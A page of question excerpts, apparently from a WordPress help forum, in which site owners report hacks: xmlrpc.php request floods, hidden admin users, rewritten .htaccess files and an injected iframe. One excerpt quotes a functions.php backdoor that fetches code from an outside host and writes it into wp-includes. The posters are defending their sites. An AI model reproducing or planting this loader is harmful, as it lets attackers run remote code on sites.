Restrict access to xmlrpc.php

I am fairly new to WordPress and I recently noted a huge amount of traffic hitting the following:

162.242.170.222 - - [01/Aug/2014:08:18:54 -0500] "POST /xmlrpc.php HTTP/1.0" 503 4859
162.242.170.222 - - [01/Aug/2014:08:19:01 -0500] "POST /xmlrpc.php HTTP/1.0" 503 4859
162.242.170.222 - - [01/Aug/2014:08:19:01 -0500] "POST /xmlrpc.php HTTP/1.0" 503 4859
162.242.170.222 - - [01/Aug/2014:08:19:02 -0500] "POST /xmlrpc.php …

Has anyone experience w/ WordPress (MultiSite) hidden users (possibly hacked)?

I have 2 WordPress MultiSite installs (on different accounts, but under the same HostGator reseller a/c) and both seem to have been compromised. I say "compromised" because the user_logins have been modified (somehow) and "hidden users" are being shown via WP Admin. I attempted to log in to the installs, which are both up-to-date (3.1) MultiSites. …

Is this a hacking script in function.php?

I have code like below in neve theme WordPress. I feel suspicious about this code:

    $wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
    if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
        if (stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
            @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
            if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                    …

WordPress site hacked. Has .htaccess been hacked?

I'm trying to clean up a WordPress website that's been hacked. I noticed that the .htaccess file has some suspect-looking regular expressions, but my regex skills are pretty weak (time to learn, I guess). I've tried replacing the .htaccess file with the default WordPress .htaccess, but it gets rewritten immediately and automatically. What I …

If a hacker changed the blog_charset to UTF-7 does that make WordPress vulnerable to further attacks?

I had a client who got hacked recently and I noticed that there were weird characters appearing on her site, like  and Æ. It turns out that the hackers changed the blog_charset to UTF-7 in the wp_options table in the database. I set it back to UTF-8, but I was wondering if during the …

Verifying that I have fully removed a WordPress hack?

My for-fun WordPress blog at http://fakeplasticrock.com (running WordPress 3.1.1) got hacked — it was showing an <iframe> on every page like so:

    <iframe src="http://evilsite.com/go/1"></iframe>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

I did the following:

- Upgraded to 3.1.3 via the built-in WordPress upgrade system
- Installed the Exploit Scanner (lots of …